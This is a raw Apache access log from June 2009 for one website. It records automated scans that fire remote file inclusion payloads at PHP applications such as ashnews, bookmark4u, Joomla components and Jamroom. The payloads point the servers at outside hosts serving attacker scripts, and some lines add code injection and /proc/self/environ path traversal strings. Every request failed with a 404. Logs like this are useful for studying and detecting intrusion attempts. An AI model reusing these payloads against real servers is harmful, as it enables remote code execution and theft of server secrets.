89.223.3.98 - - [29/Jun/2009:01:06:41 -0700] "GET /ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [29/Jun/2009:01:06:41 -0700] "GET /logs/access.log%20%20//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [29/Jun/2009:01:06:41 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:01:06:42 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:01:06:42 -0700] "GET /logs/access.log%20%20//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [29/Jun/2009:01:06:53 -0700] "GET /ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [29/Jun/2009:01:06:53 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [29/Jun/2009:01:06:53 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [29/Jun/2009:01:07:13 -0700] "GET /logs/access_090126.log//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [29/Jun/2009:01:07:14 -0700] "GET /logs/access_090126.log//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [29/Jun/2009:01:07:16 -0700] "GET /ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [29/Jun/2009:01:07:16 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [29/Jun/2009:01:07:16 -0700] "GET /logs/access_090413.log//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [29/Jun/2009:01:07:27 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [29/Jun/2009:01:07:27 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [29/Jun/2009:01:07:27 -0700] "GET /ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [29/Jun/2009:01:07:28 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [29/Jun/2009:01:07:28 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [29/Jun/2009:01:07:28 -0700] "GET /ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [29/Jun/2009:01:07:30 -0700] "GET /ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [29/Jun/2009:01:07:30 -0700] "GET /logs/access_090413.log//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [29/Jun/2009:01:07:30 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
64.186.128.233 - - [29/Jun/2009:01:07:31 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
64.186.128.233 - - [29/Jun/2009:01:07:31 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
64.186.128.233 - - [29/Jun/2009:01:07:31 -0700] "GET /logs/access.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:01:07:41 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:01:07:41 -0700] "GET /ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [29/Jun/2009:01:07:42 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:01:07:44 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:01:07:47 -0700] "GET /logs/access_090126.log//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:01:07:47 -0700] "GET /logs/access_090126.log//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [29/Jun/2009:01:07:53 -0700] "GET /logs/access_090126.log//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
87.16.83.70 - - [29/Jun/2009:01:09:25 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
87.16.83.70 - - [29/Jun/2009:01:09:25 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
87.16.83.70 - - [29/Jun/2009:01:09:25 -0700] "GET /logs/access.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:01:10:07 -0700] "GET /logs/access.log%20%20//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:01:10:07 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:01:10:07 -0700] "GET /ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:01:10:23 -0700] "GET /logs/access_090413.log//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:01:10:23 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:01:10:23 -0700] "GET /ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:01:10:49 -0700] "GET /ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:01:10:49 -0700] "GET /logs/access_090413.log//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:01:10:49 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [29/Jun/2009:01:10:52 -0700] "GET /logs/access_090413.log//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
64.186.128.233 - - [29/Jun/2009:01:10:52 -0700] "GET /logs/access_090105.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:01:11:10 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
64.186.128.233 - - [29/Jun/2009:01:11:22 -0700] "GET /logs/access_090112.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [29/Jun/2009:01:11:29 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [29/Jun/2009:01:11:29 -0700] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [29/Jun/2009:01:11:29 -0700] "GET /logs/access.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:01:11:33 -0700] "GET /logs/access_090126.log//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:01:13:04 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:01:13:04 -0700] "GET /logs/access.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:01:13:04 -0700] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
67.161.198.16 - - [29/Jun/2009:01:13:30 -0700] "GET /logs/access.log/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.vspeaking.com"
67.161.198.16 - - [29/Jun/2009:01:13:30 -0700] "GET /logs/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.vspeaking.com"
67.161.198.16 - - [29/Jun/2009:01:13:30 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.vspeaking.com"
67.161.198.16 - - [29/Jun/2009:01:13:31 -0700] "GET /logs/access.log/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.vspeaking.com"
67.161.198.16 - - [29/Jun/2009:01:13:31 -0700] "GET /logs/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.vspeaking.com"
67.161.198.16 - - [29/Jun/2009:01:13:31 -0700] "GET /errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.vspeaking.com"
67.161.198.16 - - [29/Jun/2009:01:13:31 -0700] "GET /logs/access.log/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
67.161.198.16 - - [29/Jun/2009:01:13:31 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
67.161.198.16 - - [29/Jun/2009:01:13:31 -0700] "GET /logs/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
67.161.198.16 - - [29/Jun/2009:01:13:31 -0700] "GET /logs/access.log/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
67.161.198.16 - - [29/Jun/2009:01:13:31 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
67.161.198.16 - - [29/Jun/2009:01:13:31 -0700] "GET /logs/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
64.186.128.233 - - [29/Jun/2009:01:13:35 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [29/Jun/2009:01:14:59 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [29/Jun/2009:01:15:37 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [29/Jun/2009:01:15:37 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [29/Jun/2009:01:15:37 -0700] "GET /logs/access.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [29/Jun/2009:01:15:38 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [29/Jun/2009:01:15:38 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [29/Jun/2009:01:15:38 -0700] "GET /logs/access.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [29/Jun/2009:01:16:11 -0700] "GET /logs/access.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [29/Jun/2009:01:16:11 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [29/Jun/2009:01:16:11 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:01:16:37 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
64.186.128.233 - - [29/Jun/2009:01:17:51 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [29/Jun/2009:01:20:13 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:01:23:07 -0700] "GET /logs/access_090413.log//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
125.131.116.12 - - [29/Jun/2009:01:23:30 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://munbaekcho.es.kr/gallery/language/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
125.131.116.12 - - [29/Jun/2009:01:23:31 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://munbaekcho.es.kr/gallery/language/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
125.131.116.12 - - [29/Jun/2009:01:23:32 -0700] "GET /logs/access_090126.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://munbaekcho.es.kr/gallery/language/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
64.186.128.233 - - [29/Jun/2009:01:25:08 -0700] "GET /logs/access_090413.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
87.16.83.70 - - [29/Jun/2009:01:25:37 -0700] "GET /logs/access_090413.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.98.209.71 - - [29/Jun/2009:01:29:28 -0700] "GET /index.php?meio.php=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.98.209.71 - - [29/Jun/2009:01:29:28 -0700] "GET /logs/access_090413.log/index.php?meio.php=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.98.209.71 - - [29/Jun/2009:01:29:28 -0700] "GET /logs/index.php?meio.php=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
84.201.208.50 - - [29/Jun/2009:01:29:54 -0700] "GET /index.php?meio.php=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
84.201.208.50 - - [29/Jun/2009:01:29:54 -0700] "GET /logs/index.php?meio.php=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
84.201.208.50 - - [29/Jun/2009:01:29:54 -0700] "GET /logs/access_090413.log/index.php?meio.php=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
87.16.83.70 - - [29/Jun/2009:01:30:28 -0700] "GET /logs/access.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
84.201.208.50 - - [29/Jun/2009:01:31:32 -0700] "GET /logs/access.log/index.php?meio.php=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.191.11.195 - - [29/Jun/2009:01:33:34 -0700] "GET /logs/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.vspeaking.com"
89.191.11.195 - - [29/Jun/2009:01:33:34 -0700] "GET /logs/access.log/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.vspeaking.com"
89.191.11.195 - - [29/Jun/2009:01:33:35 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.vspeaking.com"
89.191.11.195 - - [29/Jun/2009:01:33:35 -0700] "GET /logs/access.log/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.vspeaking.com"
89.191.11.195 - - [29/Jun/2009:01:33:35 -0700] "GET /errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.vspeaking.com"
89.191.11.195 - - [29/Jun/2009:01:33:35 -0700] "GET /logs/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.vspeaking.com"
89.191.11.195 - - [29/Jun/2009:01:33:35 -0700] "GET /logs/access.log/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
89.191.11.195 - - [29/Jun/2009:01:33:35 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
89.191.11.195 - - [29/Jun/2009:01:33:35 -0700] "GET /logs/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
89.191.11.195 - - [29/Jun/2009:01:33:35 -0700] "GET /logs/access.log/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
89.191.11.195 - - [29/Jun/2009:01:33:36 -0700] "GET /logs/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
89.191.11.195 - - [29/Jun/2009:01:33:36 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
211.189.18.73 - - [29/Jun/2009:01:34:00 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
211.189.18.73 - - [29/Jun/2009:01:34:00 -0700] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
211.189.18.73 - - [29/Jun/2009:01:34:00 -0700] "GET /logs/access.log/modules/Neos_Chronos/header.php?base_folder=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
211.189.18.73 - - [29/Jun/2009:01:34:18 -0700] "GET /logs/access.log/modules/Neos_Chronos/header.php?base_folder=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
211.189.18.73 - - [29/Jun/2009:01:34:18 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
211.189.18.73 - - [29/Jun/2009:01:34:18 -0700] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
211.189.18.73 - - [29/Jun/2009:01:36:25 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
211.189.18.73 - - [29/Jun/2009:01:36:25 -0700] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
211.189.18.73 - - [29/Jun/2009:01:36:25 -0700] "GET /logs/access.log%20%20/modules/Neos_Chronos/header.php?base_folder=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:01:37:36 -0700] "GET /logs/access_090413.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
216.246.98.115 - - [29/Jun/2009:01:39:58 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
